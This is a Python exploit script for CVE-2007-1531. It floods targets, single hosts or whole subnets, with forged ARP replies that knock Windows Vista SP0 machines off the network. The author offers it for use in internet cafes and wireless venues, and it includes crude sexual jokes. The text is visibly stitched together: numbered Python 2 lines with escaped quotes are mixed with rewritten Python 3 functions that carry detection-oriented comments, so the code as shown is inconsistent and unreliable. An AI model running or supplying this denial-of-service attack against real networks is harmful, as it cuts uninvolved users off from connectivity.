
MS Windows Vista forged ARP packet Network Stack DoS Exploit

MS Windows Vista forged ARP packet Network Stack DoS Exploit

Code Language : Python
  1. #!/usr/bin/env python
  2. #
  3. # :: Kristian Hermansen ::
  4. # Date: 20070514
  5. # Reference: CVE-2007-1531
  6. # Description: Microsoft Windows Vista (SP0) dumps interfaces when
  7. # it receives this ARP packet. This DoS is useful for an internet
  8. # cafe, wireless venue, or legitimate local attack. The victim will
  9. # need to manually refresh their network interface. OK, sure
  10. # it's a dumb local attack, but why does Vista disable iface!?!??
  11. # -> Thanks to Newsham / Hoagland
  12. # Vulnerable: Microsoft Windows Vista (SP0) [All Versions]
  13. # Tested:
  14. # * victim == Windows Vista Enterprise (SP0) [English]
  15. # * attacker == Ubuntu Feisty (7.04)
  16. # Usage: python fISTArp.py <victim>
  17. # Depends: scapy.py
  18. # [?] If you don't have scapy
  19. # [+] wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py
  20.  
  21. from sys import argv
  22. from os import geteuid
  23. from scapy import Ether,ARP,send,srp,conf
  24. from time import sleep
  25.  
  26. conf.verb = 0
  27.  
def head():
  """Print the fISTArp ASCII-art banner to stdout; returns None."""
  # One triple-quoted literal so the art prints exactly as the author laid it
  # out. Note that the trailing backslash on the third art row is a line
  # continuation inside the literal, so that row and the next print joined;
  # this matches the original behaviour and is deliberately left untouched.
  banner = """
           __ ___ ____ _____ _        
          / _|_ _/ ___|_  _|/ \ _ __ _ __
          | |_ | |\___ \ | | / _ \ | '__| '_ \
          | _|| | ___) || |/ ___ \| | | |_) |
          |_| |___|____/ |_/_/  \_\_| | .__/
                         |_|  
 
 """
  print(banner)
  38.  
def isroot():
  """Return True when the effective uid is 0.

  Raw-socket work in the rest of the script needs root; when the check
  fails a short hint is printed and False is returned so the caller can
  bail out.
  """
  if geteuid() == 0:
    return True
  print("TRY AGAIN AS ROOT SILLY...")
  return False
  45.  
def usage():
  """Print the synopsis and two invocation examples (single host, CIDR range)."""
  prog = argv[0]
  # Space-joined so the output matches the original comma-separated prints.
  print(" ".join(["usage:", prog, "<victim(s)>"]))
  print(" ".join(["examples:", prog, "192.168.1.100"]))
  print(" ".join(["examples:", prog, "192.168.1.0/24\n"]))
  50.  
def fisting():
 """Probe every address in argv[1] and send each live host the ARP reply from the header's CVE.

 What this loop puts on the wire (useful when writing a detection for it):
   * every 3 s, for each target address, a broadcast Ethernet frame carrying an
     ARP request for that address; one answer within 0.1 s means "alive";
   * to each live host, one ARP reply (op=2) whose sender IP (psrc) has been set
     equal to the target IP (pdst) -- a reply claiming the victim's own address
     as its sender is the malformed packet the header describes;
   * a second broadcast probe; one unanswered probe is reported as "shut down".
     With a 0.1 s timeout a missed answer is not proof the interface dropped.
 Never returns normally: the outer loop runs until CTRL-C.

 NOTE(review): argv[1] may be a CIDR range (see usage()); iterating the ARP
 packet presumably expands it once per host address -- confirm against the
 scapy version in use. Affected platform per the header is Vista SP0 only;
 nothing on this page states behaviour on later versions.
 """
 arp_fist = ARP(pdst=argv[1],op=2)
 print \"We are going to loop forever, CTRL-C to stop...\n\"
 while True:
   sleep(3)
   for a in arp_fist:
     # Liveness probe: broadcast ARP request for this single address.
     arping = Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=a.pdst)
     ans,unans = srp(arping,timeout=0.1)
     if len(ans) == 1:
       # Sender IP == target IP: this is the trigger condition referenced by
       # the CVE in the header, and the field a network sensor can match on.
       a.psrc=a.pdst
       print a.pdst, \"is ALIVE!\"
       print \"* Time to shut it down!\"
       send(a)
       # Re-probe; no answer is read as "interface dropped".
       ans2,unans2 = srp(arping,timeout=0.1)
       if len(unans2) == 1:
         print \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"
         print \"@@@\", a.psrc, \"was rubber fisted!\"
         print \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"
         sleep(3)
       else:
         print \"FAILED:\", a.pdst, \"is still alive :-(\"
     else:
       print a.pdst, \"is already DEAD!\"
     print
  75.  
# Entry point: banner, privilege check, argument check, then the send loop.
head()
if not isroot():
  exit(1)
if len(argv) != 2:
  usage()
  exit(1)
fisting()
  84.  
  85. # u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.